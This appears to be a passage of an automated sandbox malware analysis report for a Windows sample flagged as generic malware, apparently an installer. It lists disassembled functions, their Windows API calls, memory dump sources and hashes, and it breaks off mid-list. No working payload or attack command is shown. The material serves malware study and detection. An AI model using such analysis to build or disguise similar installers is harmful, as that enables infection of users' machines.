                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AddressDirectoryHandleLibraryLoadModuleProcSystemwsprintf
                                                                        • String ID:
                                                                        • API String ID: 2547128583-0
                                                                        • Opcode ID: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
                                                                        • Instruction ID: 42df78af1693d05b1f4151e300c7058424afa75421c13d02aa0b0909378b53c4
                                                                        • Opcode Fuzzy Hash: b12ffe7be00a10b97de861747ec59dbd41b3c1b34775c1b4ed269191f8b45ceb
                                                                        • Instruction Fuzzy Hash: 7FE086326042106BD3105B755E0493B73AC9E997103020D3EF94AF2140D7399C32966D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405DEA Relevance: 3.0, APIs: 2, Instructions: 16fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(00000003,00402F4C,C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe,80000000,00000003,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405DEE
                                                                        • CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00405E10
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: File$AttributesCreate
                                                                        • String ID:
                                                                        • API String ID: 415043291-0
                                                                        • Opcode ID: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                        • Instruction ID: ee59d6d0e1d409ab4f08bbdf592326cff3c7222ef74ae4255e7f212f1854b30f
                                                                        • Opcode Fuzzy Hash: 495096ec3bada98d59396949f3e5d8db788c55d9a14f95543a77051fd5c04aa8
                                                                        • Instruction Fuzzy Hash: F5D09E31654201AFEF0D8F20DE16F2E7AA2EB84B00F11952CB782941E1DA715819AB19
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405DC5 Relevance: 3.0, APIs: 2, Instructions: 13COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetFileAttributesA.KERNELBASE(?,?,004059DD,?,?,00000000,00405BC0,?,?,?,?), ref: 00405DCA
                                                                        • SetFileAttributesA.KERNEL32(?,00000000), ref: 00405DDE
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: AttributesFile
                                                                        • String ID:
                                                                        • API String ID: 3188754299-0
                                                                        • Opcode ID: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                        • Instruction ID: 1444cfec4ca9bf1d34442b2169c12043b22736e773fd5239433e8f32ad8d098d
                                                                        • Opcode Fuzzy Hash: 7db639ec3fc6e9a5b47d3eb1dfb332e917e8410632ca84ceba79978e33b6a3d0
                                                                        • Instruction Fuzzy Hash: 6FD0C972504421ABC6112728EE0C89BBB55DB54271702CA36FDA5A26B1DB304C569A98
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004058BB Relevance: 3.0, APIs: 2, Instructions: 9COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • CreateDirectoryA.KERNELBASE(?,00000000,004033A6,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 004058C1
                                                                        • GetLastError.KERNEL32(?,00000007,00000009,0000000B), ref: 004058CF
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CreateDirectoryErrorLast
                                                                        • String ID:
                                                                        • API String ID: 1375471231-0
                                                                        • Opcode ID: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                        • Instruction ID: 3fc85bafe69b7557593d5765bf5919c43deceba34b0c9ea4212deea00e127d8c
                                                                        • Opcode Fuzzy Hash: 16e4c654e9ce22ade12b11bcec0acffe1e0d8e5e5550dff24455bfee17a8caa2
                                                                        • Instruction Fuzzy Hash: 34C04C31214601EED6106B219E08B177BE5AB50741F25843E6646F00A0DE388469DA2D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405E62 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403368,00000000,00000000,00403192,000000FF,00000004,00000000,00000000,00000000), ref: 00405E76
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FileRead
                                                                        • String ID:
                                                                        • API String ID: 2738559852-0
                                                                        • Opcode ID: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                        • Instruction ID: d159feaa40f66387c232a0365126d803d89e879c5a9a8176c13ce5bb2f202f1c
                                                                        • Opcode Fuzzy Hash: da94c88c01f32db49c143d41d40f73f2c481f3bafd85dc9fd8b917d4e0158b31
                                                                        • Instruction Fuzzy Hash: CFE0B63221025AAFDF109F95DC00AAB7B6CEB05260F144437FD99E6150D671E961DAE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00405E91 Relevance: 1.5, APIs: 1, Instructions: 22fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,0040331E,00000000,0041D448,000000FF,0041D448,000000FF,000000FF,00000004,00000000), ref: 00405EA5
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FileWrite
                                                                        • String ID:
                                                                        • API String ID: 3934441357-0
                                                                        • Opcode ID: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                        • Instruction ID: f6dbd1b2bb29cf3778f9da1b12eb4ab865b2d476cff05d6c6da3e568d4bed244
                                                                        • Opcode Fuzzy Hash: 3dec9289c2e50997f5b7f42c7d661c3d3292bfbb80aff78175bf8fde073ef60e
                                                                        • Instruction Fuzzy Hash: CEE0EC3221165AABEF119F65DC00AEB7B6CEB05361F004836FA95E3150D631E9219BE4
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004060DD Relevance: 1.5, APIs: 1, Instructions: 19registryCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • RegOpenKeyExA.KERNELBASE(00000000,?,00000000,?,?,?,?,?,0040616B,?,?,?,?,00000002,ExecToStack), ref: 00406101
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: Open
                                                                        • String ID:
                                                                        • API String ID: 71445658-0
                                                                        • Opcode ID: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                        • Instruction ID: acfb9daac442d6471bee54970dc50a73ebaac4160da87f0822be439bec8b4f66
                                                                        • Opcode Fuzzy Hash: 759d75b29ffd137612e455953a298f0698f5beae901813cd77d6ec234b014f3e
                                                                        • Instruction Fuzzy Hash: 01D0123204020DFBEF119F90DD05FAB3B1DAB08310F014426FE06A4091D776D530A724
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00404320 Relevance: 1.5, APIs: 1, Instructions: 9windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageA.USER32(0001047E,00000000,00000000,00000000), ref: 00404332
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: b93bfa62a0d17583d47994c5deeb5958d6a7eb45b0bac583054f51af99654720
                                                                        • Instruction ID: 5c6e1af33eb05755d943f79c15c7bc1e123e6569ffc521d05fa768bf99fbbdf6
                                                                        • Opcode Fuzzy Hash: b93bfa62a0d17583d47994c5deeb5958d6a7eb45b0bac583054f51af99654720
                                                                        • Instruction Fuzzy Hash: E9C09B717447017FEE20DB619D45F0777986760701F2544397751F60D0C674E410D61C
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 0040336B Relevance: 1.5, APIs: 1, Instructions: 6COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SetFilePointer.KERNELBASE(00000000,00000000,00000000,004030D1,?,?,?,004036FD,?,?,00000007,00000009,0000000B), ref: 00403379
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: FilePointer
                                                                        • String ID:
                                                                        • API String ID: 973152223-0
                                                                        • Opcode ID: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                        • Instruction ID: eadcf480fe67690f272c505b4903882a1233053cb438a9b9796e5ea94341b5dd
                                                                        • Opcode Fuzzy Hash: 3686d685932152b10745f2b752acc0f7a7db7aadca6958b8d51083a7e9476777
                                                                        • Instruction Fuzzy Hash: 25B09231140200AADA215F409E09F057B21AB94700F208424B244280F086712025EA0D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 00404309 Relevance: 1.5, APIs: 1, Instructions: 6windowCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • SendMessageA.USER32(00000028,?,00000001,00404139), ref: 00404317
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: MessageSend
                                                                        • String ID:
                                                                        • API String ID: 3850602802-0
                                                                        • Opcode ID: 52ed36bf426171ca8e77ff219833bebd4cd9702e05723d5fb87fa54f4c2163d0
                                                                        • Instruction ID: 1318e1a831b13f4a694e23e2858010ee9933afb9cbbae162fbad06e3603bfc21
                                                                        • Opcode Fuzzy Hash: 52ed36bf426171ca8e77ff219833bebd4cd9702e05723d5fb87fa54f4c2163d0
                                                                        • Instruction Fuzzy Hash: A9B09236284A00ABDA215B50DE09F4A7A72A768701F408039B240250B0CAB200A5EB18
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004042F6 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • KiUserCallbackDispatcher.NTDLL(?,004040D2), ref: 00404300
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CallbackDispatcherUser
                                                                        • String ID:
                                                                        • API String ID: 2492992576-0
                                                                        • Opcode ID: 79f4c344832d221aace4b62902680fcbf7870811690861caeb07dff72c7a6dc1
                                                                        • Instruction ID: f9921b4c88a1a0ed6e9c6eedf741b01f94502565facb500019f25752580a62db
                                                                        • Opcode Fuzzy Hash: 79f4c344832d221aace4b62902680fcbf7870811690861caeb07dff72c7a6dc1
                                                                        • Instruction Fuzzy Hash: C5A011B2000000AFCB02AB00EF08C0ABBA2ABA0300B008838A280800388B320832EB0A
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Non-executed Functions

                                                                        Function 00404766 Relevance: 26.5, APIs: 10, Strings: 5, Instructions: 274stringCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • GetDlgItem.USER32(?,000003FB), ref: 004047B5
                                                                        • SetWindowTextA.USER32(00000000,?), ref: 004047DF
                                                                        • SHBrowseForFolderA.SHELL32(?,00429C68,?), ref: 00404890
                                                                        • CoTaskMemFree.OLE32(00000000), ref: 0040489B
                                                                        • lstrcmpiA.KERNEL32(ExecToStack,Drivelingly Setup: Installing), ref: 004048CD
                                                                        • lstrcatA.KERNEL32(?,ExecToStack), ref: 004048D9
                                                                        • SetDlgItemTextA.USER32(?,000003FB,?), ref: 004048EB
                                                                          • Part of subcall function 00405951: GetDlgItemTextA.USER32(?,?,00000400,00404922), ref: 00405964
                                                                          • Part of subcall function 00406535: CharNextA.USER32(0000000B,*?|<>/":,00000000,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040658D
                                                                          • Part of subcall function 00406535: CharNextA.USER32(0000000B,0000000B,0000000B,00000000,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040659A
                                                                          • Part of subcall function 00406535: CharNextA.USER32(0000000B,?,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 0040659F
                                                                          • Part of subcall function 00406535: CharPrevA.USER32(0000000B,0000000B,774D3410,C:\Users\user\AppData\Local\Temp\,"C:\Users\user\Desktop\SecuriteInfo.com.Win32.Malware-gen.9746.16728.exe",0040338E,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403690,?,00000007,00000009,0000000B), ref: 004065AF
                                                                        • GetDiskFreeSpaceA.KERNEL32(00429860,?,?,0000040F,?,00429860,00429860,?,00000001,00429860,?,?,000003FB,?), ref: 004049A9
                                                                        • MulDiv.KERNEL32(?,0000040F,00000400), ref: 004049C4
                                                                          • Part of subcall function 00404B1D: lstrlenA.KERNEL32(Drivelingly Setup: Installing,Drivelingly Setup: Installing,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,00404A38,000000DF,00000000,00000400,?), ref: 00404BBB
                                                                          • Part of subcall function 00404B1D: wsprintfA.USER32 ref: 00404BC3
                                                                          • Part of subcall function 00404B1D: SetDlgItemTextA.USER32(?,Drivelingly Setup: Installing), ref: 00404BD6
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000430000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.0000000000434000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000043C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378869869.000000000043E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                        Similarity
                                                                        • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpilstrlenwsprintf
                                                                        • String ID: A$C:\Users\user\AppData\Local\Temp\Moviedom230$Drivelingly Setup: Installing$ExecToStack$Y,J
                                                                        • API String ID: 2624150263-2995931047
                                                                        • Opcode ID: 38a92cecc9cfb0f499b3f0b849dfcbf26f74d62f4bacbe9aff44cee51a7563e9
                                                                        • Instruction ID: 575699f201696e67f0f9c35a0e1f8108b56c42fe30a04e4012ee5e208413707b
                                                                        • Opcode Fuzzy Hash: 38a92cecc9cfb0f499b3f0b849dfcbf26f74d62f4bacbe9aff44cee51a7563e9
                                                                        • Instruction Fuzzy Hash: 89A18FB1A00209ABDB11AFA6CD41AAF77B8AF84314F14843BF601B62D1D77C99518F6D
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 004027AA Relevance: 1.5, APIs: 1, Instructions: 29fileCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 004027B9
                                                                        Memory Dump Source
                                                                        • Source File: 00000000.00000002.1378554391.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                        • Associated: 00000000.00000002.1378530105.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378582802.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                        • Associated: 00000000.00000002.1378625572.000000000042A000.00000004.00000001.01000000.00000003.sdmpDownload File
